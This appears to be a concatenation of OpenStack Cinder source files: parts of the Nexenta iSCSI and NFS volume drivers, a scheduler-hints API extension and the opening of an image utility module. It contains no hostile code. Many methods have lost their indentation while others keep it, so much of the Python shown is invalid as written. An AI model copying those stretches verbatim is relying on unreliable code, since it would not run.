    if origin and self._is_clone_snapshot_name(origin):
        volume, snapshot = origin.split('@')
        # Remove the '<pool>/' prefix explicitly.  The previous
        # str.lstrip() call stripped a *character set*, not a prefix,
        # and could eat leading characters of the volume name (e.g.
        # 'tank/nada' -> 'da' instead of 'nada').
        prefix = '%s/' % self.configuration.nexenta_volume
        if volume.startswith(prefix):
            volume = volume[len(prefix):]
        try:
            self.delete_snapshot({'volume_name': volume, 'name': snapshot})
        except nexenta.NexentaException as exc:
            LOG.warning(_('Cannot delete snapshot %(origin)s: %(exc)s'),
                        {'origin': origin, 'exc': exc})
def create_cloned_volume(self, volume, src_vref):
    """Creates a clone of the specified volume.

    Implemented as a zfs clone: a temporary snapshot of the source
    volume is taken and the new volume is created from it.

    :param volume: new volume reference
    :param src_vref: source volume reference
    """
    snapshot = {'volume_name': src_vref['name'],
                'name': self._get_clone_snapshot_name(volume)}
    LOG.debug('Creating temp snapshot of the original volume: '
              '%(volume_name)s@%(name)s', snapshot)
    # We don't delete this snapshot, because this snapshot will be origin
    # of new volume. This snapshot will be automatically promoted by NMS
    # when user will delete origin volume. But when cloned volume deleted
    # we check its origin property and delete source snapshot if needed.
    self.create_snapshot(snapshot)
    try:
        self.create_volume_from_snapshot(volume, snapshot)
    except nexenta.NexentaException:
        LOG.error(_('Volume creation failed, deleting created snapshot '
                    '%(volume_name)s@%(name)s'), snapshot)
        try:
            self.delete_snapshot(snapshot)
        except (nexenta.NexentaException, exception.SnapshotIsBusy):
            LOG.warning(_('Failed to delete zfs snapshot '
                          '%(volume_name)s@%(name)s'), snapshot)
        raise
def _get_zfs_send_recv_cmd(self, src, dst):
    """Build the rrmgr command line for replicating *src* to *dst*,
    using the driver's configured compression/buffer/connections."""
    return utils.get_rrmgr_cmd(
        src, dst,
        compression=self.rrmgr_compression,
        tcp_buf_size=self.rrmgr_tcp_buf_size,
        connections=self.rrmgr_connections)

@staticmethod
def get_nms_for_url(url):
    """Return an initialized NMS JSON-RPC proxy for *url*."""
    auto, scheme, user, password, host, port, path = (
        utils.parse_nms_url(url))
    return jsonrpc.NexentaJSONProxy(scheme, host, port, path, user,
                                    password, auto=auto)
def migrate_volume(self, ctxt, volume, host):
"""Migrate if volume and host are managed by Nexenta appliance.
:param ctxt: context
:param volume: a dictionary describing the volume to migrate
:param host: a dictionary describing the host to migrate to
"""
LOG.debug('Enter: migrate_volume: id=%(id)s, host=%(host)s' %
{'id': volume['id'], 'host': host})
false_ret = (False, None)
if volume['status'] != 'available':
return false_ret
if 'capabilities' not in host:
return false_ret
capabilities = host['capabilities']
if 'location_info' not in capabilities or \
'iscsi_target_portal_port' not in capabilities or \
'nms_url' not in capabilities:
return false_ret
iscsi_target_portal_port = capabilities['iscsi_target_portal_port']
nms_url = capabilities['nms_url']
dst_parts = capabilities['location_info'].split(':')
if capabilities.get('vendor_name') != 'Nexenta' or \
dst_parts[0] != self.__class__.__name__ or \
capabilities['free_capacity_gb'] < volume['size']:
return false_ret
dst_host, dst_volume = dst_parts[1:]
ssh_bound = False
ssh_bindings = self.nms.appliance.ssh_list_bindings()
for bind in ssh_bindings:
if bind.index(dst_host) != -1:
ssh_bound = True
break
if not ssh_bound:
LOG.warning(_("Remote NexentaStor appliance at %s should be "
"SSH-bound."), dst_host)
# Create temporary snapshot of volume on NexentaStor Appliance.
snapshot = {
'volume_name': volume['name'],
'name': utils.get_migrate_snapshot_name(volume)
}
self.create_snapshot(snapshot)
src = '%(volume)s/%(zvol)s@%(snapshot)s' % {
'volume': self.volume,
'zvol': volume['name'],
'snapshot': snapshot['name']
}
dst = ':'.join([dst_host, dst_volume])
try:
self.nms.appliance.execute(self._get_zfs_send_recv_cmd(src, dst))
except nexenta.NexentaException as exc:
LOG.warning(_("Cannot send source snapshot %(src)s to "
"destination %(dst)s. Reason: %(exc)s"),
{'src': src, 'dst': dst, 'exc': exc})
return false_ret
finally:
try:
self.delete_snapshot(snapshot)
except nexenta.NexentaException as exc:
LOG.warning(_("Cannot delete temporary source snapshot "
"%(src)s on NexentaStor Appliance: %(exc)s"),
{'src': src, 'exc': exc})
try:
self.delete_volume(volume)
except nexenta.NexentaException as exc:
LOG.warning(_("Cannot delete source volume %(volume)s on "
"NexentaStor Appliance: %(exc)s"),
{'volume': volume['name'], 'exc': exc})
dst_nms = self.get_nms_for_url(nms_url)
dst_snapshot = '%s/%s@%s' % (dst_volume, volume['name'],
snapshot['name'])
try:
dst_nms.snapshot.destroy(dst_snapshot, '')
except nexenta.NexentaException as exc:
LOG.warning(_("Cannot delete temporary destination snapshot "
"%(dst)s on NexentaStor Appliance: %(exc)s"),
{'dst': dst_snapshot, 'exc': exc})
provider_location = '%(host)s:%(port)s,1 %(name)s 0' % {
'host': dst_host,
'port': iscsi_target_portal_port,
'name': self._get_target_name(volume['name'])
}
return True, {'provider_location': provider_location}
def create_snapshot(self, snapshot):
"""Create snapshot of existing zvol on appliance.
:param snapshot: snapshot reference
"""
self.nms.zvol.create_snapshot(
self._get_zvol_name(snapshot['volume_name']),
snapshot['name'], '')
def create_volume_from_snapshot(self, volume, snapshot):
"""Create new volume from other's snapshot on appliance.
:param volume: reference of volume to be created
:param snapshot: reference of source snapshot
"""
self.nms.zvol.clone(
'%s@%s' % (self._get_zvol_name(snapshot['volume_name']),
snapshot['name']),
self._get_zvol_name(volume['name']))
    def delete_snapshot(self, snapshot):
        """Delete volume's snapshot on appliance.

        :param snapshot: snapshot reference
        :raises: exception.SnapshotIsBusy if the snapshot has dependent
                 clones
        """
        volume_name = self._get_zvol_name(snapshot['volume_name'])
        snapshot_name = '%s@%s' % (volume_name, snapshot['name'])
        try:
            self.nms.snapshot.destroy(snapshot_name, '')
        except nexenta.NexentaException as exc:
            # NMS reports failure reasons only in the message text, so the
            # error is classified by substring matching on exc.args[0].
            if "does not exist" in exc.args[0]:
                # Already gone: treat as success.
                LOG.info(_('Snapshot %s does not exist, it seems it was '
                           'already deleted.'), snapshot_name)
                return
            if "snapshot has dependent clones" in exc.args[0]:
                raise exception.SnapshotIsBusy(snapshot_name=snapshot['name'])
            raise
    def local_path(self, volume):
        """Return local path to existing local volume.

        We never have local volumes, so it raises NotImplementedError.

        :raise: :py:exc:`NotImplementedError`
        """
        raise NotImplementedError
def _target_exists(self, target):
"""Check if iSCSI target exist.
:param target: target name
:return: True if target exist, else False
"""
targets = self.nms.stmf.list_targets()
if not targets:
return False
return target in self.nms.stmf.list_targets()
def _target_group_exists(self, target_group):
"""Check if target group exist.
:param target_group: target group
:return: True if target group exist, else False
"""
groups = self.nms.stmf.list_targetgroups()
if not groups:
return False
return target_group in groups
def _target_member_in_target_group(self, target_group, target_member):
"""Check if target member in target group.
:param target_group: target group
:param target_member: target member
:return: True if target member in target group, else False
:raises: NexentaException if target group doesn't exist
"""
members = self.nms.stmf.list_targetgroup_members(target_group)
if not members:
return False
return target_member in members
def _lu_exists(self, zvol_name):
"""Check if LU exists on appliance.
:param zvol_name: Zvol name
:raises: NexentaException if zvol not exists
:return: True if LU exists, else False
"""
try:
return bool(self.nms.scsidisk.lu_exists(zvol_name))
except nexenta.NexentaException as exc:
if 'does not exist' not in exc.args[0]:
raise
return False
def _is_lu_shared(self, zvol_name):
"""Check if LU exists on appliance and shared.
:param zvol_name: Zvol name
:raises: NexentaException if Zvol not exist
:return: True if LU exists and shared, else False
"""
try:
shared = self.nms.scsidisk.lu_shared(zvol_name) > 0
except nexenta.NexentaException as exc:
if 'does not exist for zvol' not in exc.args[0]:
raise # Zvol does not exists
shared = False # LU does not exist
return shared
def _is_volume_exported(self, volume):
"""Check if volume exported.
:param volume: volume object
:return: True if volume exported, else False
"""
zvol_name = self._get_zvol_name(volume['name'])
target_name = self._get_target_name(volume['name'])
target_group_name = self._get_target_group_name(volume['name'])
return (self._target_exists(target_name) and
self._target_group_exists(target_group_name) and
self._target_member_in_target_group(target_group_name,
target_name) and
self._lu_exists(zvol_name) and
self._is_lu_shared(zvol_name))
def _get_provider_location(self, volume):
"""Returns volume iscsiadm-formatted provider location string."""
return '%(host)s:%(port)s,1 %(name)s 0' % {
'host': self.nms_host,
'port': self.configuration.nexenta_iscsi_target_portal_port,
'name': self._get_target_name(volume['name'])
}
    def _do_export(self, _ctx, volume, ensure=False):
        """Do all steps to get zvol exported as LUN 0 at separate target.

        Every step is skipped when the corresponding resource already
        exists, so the method can also repair a partially-created export.

        :param volume: reference of volume to be exported
        :param ensure: if True, ignore errors caused by already existing
                       resources
        """
        zvol_name = self._get_zvol_name(volume['name'])
        target_name = self._get_target_name(volume['name'])
        target_group_name = self._get_target_group_name(volume['name'])
        # NMS reports failures only via message text, so the except blocks
        # below classify errors by substring matching on exc.args[0].
        if not self._target_exists(target_name):
            try:
                self.nms.iscsitarget.create_target({
                    'target_name': target_name})
            except nexenta.NexentaException as exc:
                if ensure and 'already configured' in exc.args[0]:
                    LOG.info(_('Ignored target creation error "%s" while '
                               'ensuring export'), exc)
                else:
                    raise
        if not self._target_group_exists(target_group_name):
            try:
                self.nms.stmf.create_targetgroup(target_group_name)
            except nexenta.NexentaException as exc:
                if ((ensure and 'already exists' in exc.args[0]) or
                        'target must be offline' in exc.args[0]):
                    LOG.info(_('Ignored target group creation error "%s" '
                               'while ensuring export'), exc)
                else:
                    raise
        if not self._target_member_in_target_group(target_group_name,
                                                   target_name):
            try:
                self.nms.stmf.add_targetgroup_member(target_group_name,
                                                     target_name)
            except nexenta.NexentaException as exc:
                if ((ensure and 'already exists' in exc.args[0]) or
                        'target must be offline' in exc.args[0]):
                    LOG.info(_('Ignored target group member addition error '
                               '"%s" while ensuring export'), exc)
                else:
                    raise
        if not self._lu_exists(zvol_name):
            try:
                self.nms.scsidisk.create_lu(zvol_name, {})
            except nexenta.NexentaException as exc:
                if not ensure or 'in use' not in exc.args[0]:
                    raise
                LOG.info(_('Ignored LU creation error "%s" while ensuring '
                           'export'), exc)
        if not self._is_lu_shared(zvol_name):
            try:
                # Expose the LU as LUN 0 inside the volume's target group.
                self.nms.scsidisk.add_lun_mapping_entry(zvol_name, {
                    'target_group': target_group_name,
                    'lun': '0'})
            except nexenta.NexentaException as exc:
                if not ensure or 'view entry exists' not in exc.args[0]:
                    raise
                LOG.info(_('Ignored LUN mapping entry addition error "%s" '
                           'while ensuring export'), exc)
def create_export(self, _ctx, volume):
"""Create new export for zvol.
:param volume: reference of volume to be exported
:return: iscsiadm-formatted provider location string
"""
self._do_export(_ctx, volume, ensure=False)
return {'provider_location': self._get_provider_location(volume)}
    def ensure_export(self, _ctx, volume):
        """Recreate parts of export if necessary.

        Idempotent variant of create_export: errors caused by
        already-existing resources are ignored.

        :param volume: reference of volume to be exported
        """
        self._do_export(_ctx, volume, ensure=True)
def remove_export(self, _ctx, volume):
"""Destroy all resources created to export zvol.
:param volume: reference of volume to be unexported
"""
zvol_name = self._get_zvol_name(volume['name'])
target_name = self._get_target_name(volume['name'])
target_group_name = self._get_target_group_name(volume['name'])
self.nms.scsidisk.delete_lu(zvol_name)
try:
self.nms.stmf.destroy_targetgroup(target_group_name)
except nexenta.NexentaException as exc:
# We assume that target group is already gone
LOG.warn(_('Got error trying to destroy target group'
' %(target_group)s, assuming it is '
'already gone: %(exc)s'),
{'target_group': target_group_name, 'exc': exc})
try:
self.nms.iscsitarget.delete_target(target_name)
except nexenta.NexentaException as exc:
# We assume that target is gone as well
LOG.warn(_('Got error trying to delete target %(target)s,'
' assuming it is already gone: %(exc)s'),
{'target': target_name, 'exc': exc})
    def get_volume_stats(self, refresh=False):
        """Get volume stats.

        If 'refresh' is True, run update the stats first.
        """
        if refresh:
            self._update_volume_stats()
        # Otherwise serve the cached stats populated by the last refresh.
        return self._stats
    def _update_volume_stats(self):
        """Retrieve stats info for NexentaStor appliance."""
        LOG.debug('Updating volume stats')
        # Ask NMS for the backing volume's capacity properties in one call.
        stats = self.nms.volume.get_child_props(
            self.configuration.nexenta_volume, 'health|size|used|available')
        total_amount = utils.str2gib_size(stats['size'])
        free_amount = utils.str2gib_size(stats['available'])
        # location_info is parsed by migrate_volume on the destination side:
        # "<driver class>:<nms host>:<volume>".
        location_info = '%(driver)s:%(host)s:%(volume)s' % {
            'driver': self.__class__.__name__,
            'host': self.nms_host,
            'volume': self.volume
        }
        self._stats = {
            'vendor_name': 'Nexenta',
            'driver_version': self.VERSION,
            'storage_protocol': 'iSCSI',
            'total_capacity_gb': total_amount,
            'free_capacity_gb': free_amount,
            'reserved_percentage': 0,
            'QoS_support': False,
            'volume_backend_name': self.backend_name,
            'location_info': location_info,
            'iscsi_target_portal_port': self.iscsi_target_portal_port,
            'nms_url': self.nms.url
        }
|
adelina-t/cinder | cinder/volume/drivers/nexenta/nfs.py | <filename>cinder/volume/drivers/nexenta/nfs.py
# Copyright 2013 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`nexenta.nfs` -- Driver to store volumes on NexentaStor Appliance.
=======================================================================
.. automodule:: nexenta.nfs
.. moduleauthor:: <NAME> <<EMAIL>>
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import hashlib
import os
import re
from cinder import context
from cinder import db
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import units
from cinder.volume.drivers import nexenta
from cinder.volume.drivers.nexenta import jsonrpc
from cinder.volume.drivers.nexenta import options
from cinder.volume.drivers.nexenta import utils
from cinder.volume.drivers import nfs
VERSION = '1.1.3'
LOG = logging.getLogger(__name__)
class NexentaNfsDriver(nfs.NfsDriver):  # pylint: disable=R0921
    """Executes volume driver commands on Nexenta Appliance.

    Version history:
        1.0.0 - Initial driver version.
        1.1.0 - Auto sharing for enclosing folder.
        1.1.1 - Added caching for NexentaStor appliance 'volroot' value.
        1.1.2 - Ignore "folder does not exist" error in delete_volume and
                delete_snapshot method.
        1.1.3 - Redefined volume_backend_name attribute inherited from
                RemoteFsDriver.
    """

    driver_prefix = 'nexenta'
    volume_backend_name = 'NexentaNfsDriver'
    VERSION = VERSION

    def __init__(self, *args, **kwargs):
        super(NexentaNfsDriver, self).__init__(*args, **kwargs)
        if self.configuration:
            self.configuration.append_config_values(
                options.NEXENTA_NFS_OPTIONS)
        conf = self.configuration
        self.nms_cache_volroot = conf.nexenta_nms_cache_volroot
        # nms object -> cached 'volroot' property (see _get_volroot).
        self._nms2volroot = {}
        # NFS share address -> nms proxy of the appliance exporting it.
        self.share2nms = {}

    def do_setup(self, context):
        super(NexentaNfsDriver, self).do_setup(context)
        self._load_shares_config(getattr(self.configuration,
                                         self.driver_prefix +
                                         '_shares_config'))

    def check_for_setup_error(self):
        """Verify that the volume for our folder exists.

        :raise: :py:exc:`LookupError`
        """
        if self.share2nms:
            for nfs_share in self.share2nms:
                nms = self.share2nms[nfs_share]
                volume_name, dataset = self._get_share_datasets(nfs_share)
                if not nms.volume.object_exists(volume_name):
                    # BUG FIX: LookupError does not interpolate its
                    # arguments, so the value must be formatted into the
                    # message instead of being passed as a second argument.
                    raise LookupError(_("Volume %s does not exist in Nexenta "
                                        "Store appliance") % volume_name)
                folder = '%s/%s' % (volume_name, dataset)
                if not nms.folder.object_exists(folder):
                    raise LookupError(_("Folder %s does not exist in Nexenta "
                                        "Store appliance") % folder)
                self._share_folder(nms, volume_name, dataset)

    def initialize_connection(self, volume, connector):
        """Allow connection to connector and return connection info.

        :param volume: volume reference
        :param connector: connector reference
        """
        export = '%s/%s' % (volume['provider_location'], volume['name'])
        data = {'export': export, 'name': 'volume'}
        if volume['provider_location'] in self.shares:
            data['options'] = self.shares[volume['provider_location']]
        return {
            'driver_volume_type': self.driver_volume_type,
            'data': data
        }

    def _do_create_volume(self, volume):
        nfs_share = volume['provider_location']
        nms = self.share2nms[nfs_share]
        vol, dataset = self._get_share_datasets(nfs_share)
        folder = '%s/%s' % (dataset, volume['name'])
        LOG.debug('Creating folder on Nexenta Store %s', folder)
        nms.folder.create_with_props(
            vol, folder,
            {'compression': self.configuration.nexenta_volume_compression}
        )
        volume_path = self.remote_path(volume)
        volume_size = volume['size']
        try:
            self._share_folder(nms, vol, folder)
            if getattr(self.configuration,
                       self.driver_prefix + '_sparsed_volumes'):
                self._create_sparsed_file(nms, volume_path, volume_size)
            else:
                compression = nms.folder.get('compression')
                if compression != 'off':
                    # Disable compression, because otherwise will not use space
                    # on disk.
                    nms.folder.set('compression', 'off')
                try:
                    self._create_regular_file(nms, volume_path, volume_size)
                finally:
                    if compression != 'off':
                        # Backup default compression value if it was changed.
                        nms.folder.set('compression', compression)
            self._set_rw_permissions_for_all(nms, volume_path)
        except nexenta.NexentaException as exc:
            # Creation failed part-way: best-effort cleanup of the folder,
            # then re-raise the original error.
            try:
                nms.folder.destroy('%s/%s' % (vol, folder))
            except nexenta.NexentaException:
                LOG.warning(_("Cannot destroy created folder: "
                              "%(vol)s/%(folder)s"),
                            {'vol': vol, 'folder': folder})
            raise exc

    def create_volume_from_snapshot(self, volume, snapshot):
        """Create new volume from other's snapshot on appliance.

        :param volume: reference of volume to be created
        :param snapshot: reference of source snapshot
        """
        self._ensure_shares_mounted()
        snapshot_vol = self._get_snapshot_volume(snapshot)
        nfs_share = snapshot_vol['provider_location']
        volume['provider_location'] = nfs_share
        nms = self.share2nms[nfs_share]
        vol, dataset = self._get_share_datasets(nfs_share)
        snapshot_name = '%s/%s/%s@%s' % (vol, dataset, snapshot['volume_name'],
                                         snapshot['name'])
        folder = '%s/%s' % (dataset, volume['name'])
        nms.folder.clone(snapshot_name, '%s/%s' % (vol, folder))
        try:
            self._share_folder(nms, vol, folder)
        except nexenta.NexentaException:
            try:
                nms.folder.destroy('%s/%s' % (vol, folder), '')
            except nexenta.NexentaException:
                LOG.warning(_("Cannot destroy cloned folder: "
                              "%(vol)s/%(folder)s"),
                            {'vol': vol, 'folder': folder})
            raise
        return {'provider_location': volume['provider_location']}

    def create_cloned_volume(self, volume, src_vref):
        """Creates a clone of the specified volume.

        :param volume: new volume reference
        :param src_vref: source volume reference
        """
        LOG.info(_('Creating clone of volume: %s'), src_vref['id'])
        snapshot = {'volume_name': src_vref['name'],
                    'volume_id': src_vref['id'],
                    'name': self._get_clone_snapshot_name(volume)}
        # We don't delete this snapshot, because this snapshot will be origin
        # of new volume. This snapshot will be automatically promoted by NMS
        # when user will delete its origin.
        self.create_snapshot(snapshot)
        try:
            return self.create_volume_from_snapshot(volume, snapshot)
        except nexenta.NexentaException:
            LOG.error(_('Volume creation failed, deleting created snapshot '
                        '%(volume_name)s@%(name)s'), snapshot)
            try:
                self.delete_snapshot(snapshot)
            except (nexenta.NexentaException, exception.SnapshotIsBusy):
                LOG.warning(_('Failed to delete zfs snapshot '
                              '%(volume_name)s@%(name)s'), snapshot)
            raise

    def delete_volume(self, volume):
        """Deletes a logical volume.

        :param volume: volume reference
        """
        super(NexentaNfsDriver, self).delete_volume(volume)
        nfs_share = volume.get('provider_location')
        if nfs_share:
            nms = self.share2nms[nfs_share]
            vol, parent_folder = self._get_share_datasets(nfs_share)
            folder = '%s/%s/%s' % (vol, parent_folder, volume['name'])
            # Remember the clone origin before the folder disappears so the
            # temporary clone snapshot can be cleaned up afterwards.
            props = nms.folder.get_child_props(folder, 'origin') or {}
            try:
                nms.folder.destroy(folder, '-r')
            except nexenta.NexentaException as exc:
                if 'does not exist' in exc.args[0]:
                    LOG.info(_('Folder %s does not exist, it was '
                               'already deleted.'), folder)
                    return
                raise
            origin = props.get('origin')
            if origin and self._is_clone_snapshot_name(origin):
                try:
                    nms.snapshot.destroy(origin, '')
                except nexenta.NexentaException as exc:
                    if 'does not exist' in exc.args[0]:
                        LOG.info(_('Snapshot %s does not exist, it was '
                                   'already deleted.'), origin)
                        return
                    raise

    def create_snapshot(self, snapshot):
        """Creates a snapshot.

        :param snapshot: snapshot reference
        """
        volume = self._get_snapshot_volume(snapshot)
        nfs_share = volume['provider_location']
        nms = self.share2nms[nfs_share]
        vol, dataset = self._get_share_datasets(nfs_share)
        folder = '%s/%s/%s' % (vol, dataset, volume['name'])
        nms.folder.create_snapshot(folder, snapshot['name'], '-r')

    def delete_snapshot(self, snapshot):
        """Deletes a snapshot.

        :param snapshot: snapshot reference
        """
        volume = self._get_snapshot_volume(snapshot)
        nfs_share = volume['provider_location']
        nms = self.share2nms[nfs_share]
        vol, dataset = self._get_share_datasets(nfs_share)
        folder = '%s/%s/%s' % (vol, dataset, volume['name'])
        try:
            nms.snapshot.destroy('%s@%s' % (folder, snapshot['name']), '')
        except nexenta.NexentaException as exc:
            if 'does not exist' in exc.args[0]:
                # BUG FIX: log the snapshot name, not the whole snapshot
                # dict, so the message names the actual snapshot.
                LOG.info(_('Snapshot %s does not exist, it was '
                           'already deleted.'),
                         '%s@%s' % (folder, snapshot['name']))
                return
            raise

    def _create_sparsed_file(self, nms, path, size):
        """Creates file with 0 disk usage.

        :param nms: nms object
        :param path: path to new file
        :param size: size of file
        """
        nms.appliance.execute(
            'truncate --size %(size)dG %(path)s' % {
                'path': path,
                'size': size
            }
        )

    def _create_regular_file(self, nms, path, size):
        """Creates regular file of given size.

        Takes a lot of time for large files.

        :param nms: nms object
        :param path: path to new file
        :param size: size of file
        """
        block_size_mb = 1
        block_count = size * units.Gi / (block_size_mb * units.Mi)
        # BUG FIX: add the missing space between the two message fragments.
        LOG.info(_('Creating regular file: %s. '
                   'This may take some time.') % path)
        nms.appliance.execute(
            'dd if=/dev/zero of=%(path)s bs=%(bs)dM count=%(count)d' % {
                'path': path,
                'bs': block_size_mb,
                'count': block_count
            }
        )
        LOG.info(_('Regular file: %s created.') % path)

    def _set_rw_permissions_for_all(self, nms, path):
        """Sets 666 permissions for the path.

        :param nms: nms object
        :param path: path to file
        """
        nms.appliance.execute('chmod ugo+rw %s' % path)

    def local_path(self, volume):
        """Get volume path (mounted locally fs path) for given volume.

        :param volume: volume reference
        """
        nfs_share = volume['provider_location']
        return os.path.join(self._get_mount_point_for_share(nfs_share),
                            volume['name'], 'volume')

    def _get_mount_point_for_share(self, nfs_share):
        """Returns path to mount point NFS share.

        :param nfs_share: example 172.18.194.100:/var/nfs
        """
        return os.path.join(self.configuration.nexenta_mount_point_base,
                            hashlib.md5(nfs_share).hexdigest())

    def remote_path(self, volume):
        """Get volume path (mounted remotely fs path) for given volume.

        :param volume: volume reference
        """
        nfs_share = volume['provider_location']
        share = nfs_share.split(':')[1].rstrip('/')
        return '%s/%s/volume' % (share, volume['name'])

    def _share_folder(self, nms, volume, folder):
        """Share NFS folder on NexentaStor Appliance.

        :param nms: nms object
        :param volume: volume name
        :param folder: folder name
        """
        path = '%s/%s' % (volume, folder.lstrip('/'))
        share_opts = {
            'read_write': '*',
            'read_only': '',
            'root': 'nobody',
            'extra_options': 'anon=0',
            'recursive': 'true',
            'anonymous_rw': 'true',
        }
        LOG.debug('Sharing folder %s on Nexenta Store', folder)
        nms.netstorsvc.share_folder('svc:/network/nfs/server:default', path,
                                    share_opts)

    def _load_shares_config(self, share_file):
        self.shares = {}
        self.share2nms = {}

        for share in self._read_config_file(share_file):
            # A configuration line may be either:
            #  host:/share_name  http://user:pass@host:[port]/
            # or
            #  host:/share_name  http://user:pass@host:[port]/
            #                                           -o options=123,rw --other
            if not share.strip():
                continue
            if share.startswith('#'):
                continue

            share_info = re.split(r'\s+', share, 2)

            share_address = share_info[0].strip().decode('unicode_escape')
            nms_url = share_info[1].strip()
            share_opts = share_info[2].strip() if len(share_info) > 2 else None

            if not re.match(r'.+:/.+', share_address):
                # LOG.warn() is deprecated; use LOG.warning() like the rest
                # of this module.
                LOG.warning("Share %s ignored due to invalid format. Must "
                            "be of form address:/export." % share_address)
                continue

            self.shares[share_address] = share_opts
            self.share2nms[share_address] = self._get_nms_for_url(nms_url)

        LOG.debug('Shares loaded: %s' % self.shares)

    def _get_capacity_info(self, nfs_share):
        """Calculate available space on the NFS share.

        :param nfs_share: example 172.18.194.100:/var/nfs
        """
        nms = self.share2nms[nfs_share]
        ns_volume, ns_folder = self._get_share_datasets(nfs_share)
        folder_props = nms.folder.get_child_props('%s/%s' % (ns_volume,
                                                             ns_folder), '')
        free = utils.str2size(folder_props['available'])
        allocated = utils.str2size(folder_props['used'])
        return free + allocated, free, allocated

    def _get_nms_for_url(self, url):
        """Returns initialized nms object for url."""
        auto, scheme, user, password, host, port, path =\
            utils.parse_nms_url(url)
        return jsonrpc.NexentaJSONProxy(scheme, host, port, path, user,
                                        password, auto=auto)

    def _get_snapshot_volume(self, snapshot):
        ctxt = context.get_admin_context()
        return db.volume_get(ctxt, snapshot['volume_id'])

    def _get_volroot(self, nms):
        """Returns volroot property value from NexentaStor appliance."""
        if not self.nms_cache_volroot:
            return nms.server.get_prop('volroot')
        # Cache per appliance: volroot does not change between calls.
        if nms not in self._nms2volroot:
            self._nms2volroot[nms] = nms.server.get_prop('volroot')
        return self._nms2volroot[nms]

    def _get_share_datasets(self, nfs_share):
        # Strip the appliance's volroot prefix from the exported path and
        # split the remainder into (volume, folder).
        nms = self.share2nms[nfs_share]
        volroot = self._get_volroot(nms)
        path = nfs_share.split(':')[1][len(volroot):].strip('/')
        volume_name = path.split('/')[0]
        folder_name = '/'.join(path.split('/')[1:])
        return volume_name, folder_name

    def _get_clone_snapshot_name(self, volume):
        """Return name for snapshot that will be used to clone the volume."""
        return 'cinder-clone-snapshot-%(id)s' % volume

    def _is_clone_snapshot_name(self, snapshot):
        """Check if snapshot is created for cloning."""
        name = snapshot.split('@')[-1]
        return name.startswith('cinder-clone-snapshot-')
|
adelina-t/cinder | cinder/api/contrib/scheduler_hints.py | <reponame>adelina-t/cinder<filename>cinder/api/contrib/scheduler_hints.py
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob.exc
from cinder.api import extensions
from cinder.api.openstack import wsgi
from cinder.api.v2 import volumes
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class SchedulerHintsController(wsgi.Controller):
    """Lift 'OS-SCH-HNT:scheduler_hints' out of the request body and attach
    it to the volume dict before the core create handler runs.
    """

    @staticmethod
    def _extract_scheduler_hints(body):
        # Returns the hints mapping from *body*, or {} when absent.
        hints = {}

        attr = '%s:scheduler_hints' % Scheduler_hints.alias
        try:
            if attr in body:
                hints.update(body[attr])
        except ValueError:
            # dict.update() raises ValueError for a malformed mapping
            # payload; surface it to the API caller as a 400.
            msg = _("Malformed scheduler_hints attribute")
            raise webob.exc.HTTPBadRequest(explanation=msg)

        return hints

    @wsgi.extends
    def create(self, req, body):
        # @wsgi.extends generator: code before the yield runs ahead of the
        # core volume-create handler.
        hints = self._extract_scheduler_hints(body)

        if 'volume' in body:
            body['volume']['scheduler_hints'] = hints
        yield
class Scheduler_hints(extensions.ExtensionDescriptor):
    """Pass arbitrary key/value pairs to the scheduler."""

    name = "SchedulerHints"
    alias = "OS-SCH-HNT"
    namespace = volumes.SCHEDULER_HINTS_NAMESPACE
    updated = "2013-04-18T00:00:00+00:00"

    def get_controller_extensions(self):
        # Attach the hints controller to the core 'volumes' resource.
        volume_ext = extensions.ControllerExtension(
            self, 'volumes', SchedulerHintsController())
        return [volume_ext]
|
adelina-t/cinder | cinder/image/image_utils.py | <filename>cinder/image/image_utils.py
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper methods to deal with images.
This is essentially a copy from nova.virt.images.py
Some slight modifications, but at some point
we should look at maybe pushing this up to Oslo
"""
import contextlib
import os
import tempfile
from oslo.config import cfg
from cinder import exception
from cinder.openstack.common import fileutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import imageutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils
from cinder.openstack.common import units
from cinder import utils
from cinder.volume import utils as volume_utils
LOG = logging.getLogger(__name__)
# Scratch directory used while converting images between formats; defaults
# under the service state path.
image_helper_opt = [cfg.StrOpt('image_conversion_dir',
                               default='$state_path/conversion',
                               help='Directory used for temporary storage '
                               'during image conversion'), ]
CONF = cfg.CONF
CONF.register_opts(image_helper_opt)
def qemu_img_info(path):
    """Return an object containing the parsed output from qemu-img info.

    Runs under "env LC_ALL=C" so the output is locale-independent; that
    prefix is dropped on Windows, which has no "env" binary.
    """
    base_cmd = ('qemu-img', 'info', path)
    if os.name == 'nt':
        cmd = base_cmd
    else:
        cmd = ('env', 'LC_ALL=C') + base_cmd
    out, _err = utils.execute(*cmd, run_as_root=True)
    return imageutils.QemuImgInfo(out)
def convert_image(source, dest, out_format, bps_limit=None):
    """Convert image to other format.

    :param source: source image path
    :param dest: destination image path
